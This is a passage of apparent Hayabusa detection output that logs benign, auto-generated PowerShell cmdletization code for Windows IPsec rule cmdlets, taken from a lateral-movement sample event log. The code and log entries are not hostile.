[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) 
$__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and 
(@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = 
@(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', 
$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 
'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 
'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewP",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral 
Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.081 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,", [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) 
$__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') 
-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) 
$__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { 